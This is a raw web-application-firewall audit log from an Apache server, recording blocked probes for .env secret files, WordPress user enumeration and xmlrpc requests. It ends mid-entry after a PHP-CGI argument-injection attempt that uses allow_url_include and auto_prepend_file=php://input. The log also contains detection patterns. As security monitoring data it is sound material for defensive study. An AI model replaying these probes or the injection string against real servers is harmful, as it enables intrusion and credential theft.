aAzAj9Q6lpQjDvc0F_PF8QAAAMc 103.236.140.4 50636 103.236.140.4 8181 --76b93e40-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 128.199.182.152 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 128.199.182.152 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --76b93e40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76b93e40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745666191242845 779 (- - -) Stopwatch2: 1745666191242845 779; combined=308, p1=271, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76b93e40-Z-- --4b073c35-A-- [26/Apr/2025:18:26:42 +0700] aAzC8k3IXD9XJ6lrmIUBLgAAABU 103.236.140.4 52972 103.236.140.4 8181 --4b073c35-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept-Charset: utf-8 --4b073c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b073c35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745666802891681 953 (- - -) Stopwatch2: 1745666802891681 953; combined=428, p1=384, p2=0, p3=0, p4=0, p5=43, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b073c35-Z-- --dd801227-A-- [26/Apr/2025:18:38:53 +0700] aAzFzdDEbIDiBZnoTx5g5AAAAFc 103.236.140.4 55784 103.236.140.4 8181 --dd801227-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.189.233.36 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.189.233.36 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --dd801227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd801227-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745667533328921 871 (- - -) Stopwatch2: 1745667533328921 871; combined=382, p1=345, p2=0, p3=0, p4=0, p5=37, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd801227-Z-- --e8f45c65-A-- [26/Apr/2025:19:17:01 +0700] aAzOvdDEbIDiBZnoTx5jWgAAAFg 103.236.140.4 37860 103.236.140.4 8181 --e8f45c65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8f45c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8f45c65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745669821169256 3591 (- - -) Stopwatch2: 1745669821169256 3591; combined=1510, p1=485, p2=994, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8f45c65-Z-- --2ad50128-A-- [26/Apr/2025:19:17:03 +0700] aAzOv9Q6lpQjDvc0F_PJHgAAAMo 103.236.140.4 37872 103.236.140.4 8181 --2ad50128-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ad50128-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ad50128-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745669823549004 2779 (- - -) Stopwatch2: 1745669823549004 2779; combined=1229, p1=428, p2=772, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ad50128-Z-- --733f2a61-A-- [26/Apr/2025:19:17:05 +0700] aAzOwU3IXD9XJ6lrmIUGxQAAABA 103.236.140.4 37884 103.236.140.4 8181 --733f2a61-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --733f2a61-C-- demo.sayHello --733f2a61-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --733f2a61-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745669825949992 5233 (- - -) Stopwatch2: 1745669825949992 5233; combined=3963, p1=550, p2=3207, p3=22, p4=24, p5=93, sr=137, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --733f2a61-Z-- --d64dc016-A-- [26/Apr/2025:19:17:22 +0700] aAzO0tDEbIDiBZnoTx5jZAAAAFc 103.236.140.4 37952 103.236.140.4 8181 --d64dc016-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.143 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d64dc016-C-- demo.sayHello --d64dc016-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d64dc016-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745669842401195 6203 (- - -) Stopwatch2: 1745669842401195 6203; combined=4472, p1=523, p2=3699, p3=32, p4=35, p5=106, sr=80, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d64dc016-Z-- --44c94938-A-- [26/Apr/2025:20:10:30 +0700] aAzbRtDEbIDiBZnoTx5n0QAAAEM 103.236.140.4 55610 103.236.140.4 8181 --44c94938-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G965U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --44c94938-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44c94938-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745673030904306 808 (- - -) Stopwatch2: 1745673030904306 808; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44c94938-Z-- --dec4b77c-A-- [26/Apr/2025:20:10:50 +0700] aAzbWtDEbIDiBZnoTx5n4wAAAFM 103.236.140.4 55694 103.236.140.4 8181 --dec4b77c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.88.89 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.88.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Z971) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --dec4b77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dec4b77c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745673050750462 748 (- - -) Stopwatch2: 1745673050750462 748; combined=292, p1=258, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dec4b77c-Z-- --c5982f3b-A-- [26/Apr/2025:20:42:37 +0700] aAzizU3IXD9XJ6lrmIUOEAAAAAQ 103.236.140.4 41182 103.236.140.4 8181 --c5982f3b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --c5982f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5982f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957032632 743 (- - -) Stopwatch2: 1745674957032632 743; combined=290, p1=256, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5982f3b-Z-- --3e0d363b-A-- [26/Apr/2025:20:42:37 +0700] aAzizdQ6lpQjDvc0F_PQXAAAAMo 103.236.140.4 41188 103.236.140.4 8181 --3e0d363b-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --3e0d363b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e0d363b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957498088 725 (- - -) Stopwatch2: 1745674957498088 725; combined=315, p1=278, p2=0, p3=0, p4=0, p5=36, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e0d363b-Z-- --a4554e51-A-- [26/Apr/2025:20:42:37 +0700] aAzizdDEbIDiBZnoTx5r8AAAAFE 103.236.140.4 41190 103.236.140.4 8181 --a4554e51-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --a4554e51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4554e51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957781080 648 (- - -) Stopwatch2: 1745674957781080 648; combined=272, p1=242, p2=0, p3=0, p4=0, p5=30, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4554e51-Z-- --046c744f-A-- [26/Apr/2025:20:42:37 +0700] aAzizdDEbIDiBZnoTx5r8QAAAEk 103.236.140.4 41192 103.236.140.4 8181 --046c744f-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --046c744f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --046c744f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957878843 671 (- - -) Stopwatch2: 1745674957878843 671; combined=276, p1=226, p2=0, p3=0, p4=0, p5=50, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --046c744f-Z-- --d60b6e6d-A-- [26/Apr/2025:20:42:37 +0700] aAzizU3IXD9XJ6lrmIUOEQAAABU 103.236.140.4 41194 103.236.140.4 8181 --d60b6e6d-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --d60b6e6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d60b6e6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674957984066 641 (- - -) Stopwatch2: 1745674957984066 641; combined=263, p1=236, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d60b6e6d-Z-- --cfca1f52-A-- [26/Apr/2025:20:42:38 +0700] aAziztQ6lpQjDvc0F_PQXQAAAMw 103.236.140.4 41196 103.236.140.4 8181 --cfca1f52-B-- GET /.env.development HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --cfca1f52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfca1f52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674958124275 668 (- - -) Stopwatch2: 1745674958124275 668; combined=263, p1=224, p2=0, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfca1f52-Z-- --0f69e832-A-- [26/Apr/2025:20:42:38 +0700] aAziztQ6lpQjDvc0F_PQXwAAANM 103.236.140.4 41202 103.236.140.4 8181 --0f69e832-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --0f69e832-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f69e832-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674958443602 783 (- - -) Stopwatch2: 1745674958443602 783; combined=325, p1=285, p2=0, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f69e832-Z-- --29887459-A-- [26/Apr/2025:20:42:38 +0700] aAziznGCMLWH05JCdxxAQwAAAIY 103.236.140.4 41204 103.236.140.4 8181 --29887459-B-- GET /website/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 44.220.175.104 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 44.220.175.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Accept: */* --29887459-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29887459-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745674958643407 932 (- - -) Stopwatch2: 1745674958643407 932; combined=350, p1=302, p2=0, p3=0, p4=0, p5=48, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29887459-Z-- --3ada3e0e-A-- [26/Apr/2025:21:16:40 +0700] aAzqyHGCMLWH05JCdxxBpwAAAI0 103.236.140.4 49168 103.236.140.4 8181 --3ada3e0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.4.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.4.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3ada3e0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ada3e0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745677000034979 803 (- - -) Stopwatch2: 1745677000034979 803; combined=370, p1=332, p2=0, p3=0, p4=0, p5=37, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ada3e0e-Z-- --14671f04-A-- [26/Apr/2025:22:35:44 +0700] aAz9UHGCMLWH05JCdxxF-wAAAIM 103.236.140.4 39944 103.236.140.4 8181 --14671f04-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --14671f04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14671f04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745681744436785 858 (- - -) Stopwatch2: 1745681744436785 858; combined=296, p1=258, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14671f04-Z-- --73f64249-A-- [26/Apr/2025:22:57:59 +0700] aA0Ch03IXD9XJ6lrmIUWzgAAAA8 103.236.140.4 45108 103.236.140.4 8181 --73f64249-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 120.195.30.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 120.195.30.141 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --73f64249-C-- --73f64249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73f64249-E-- --73f64249-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 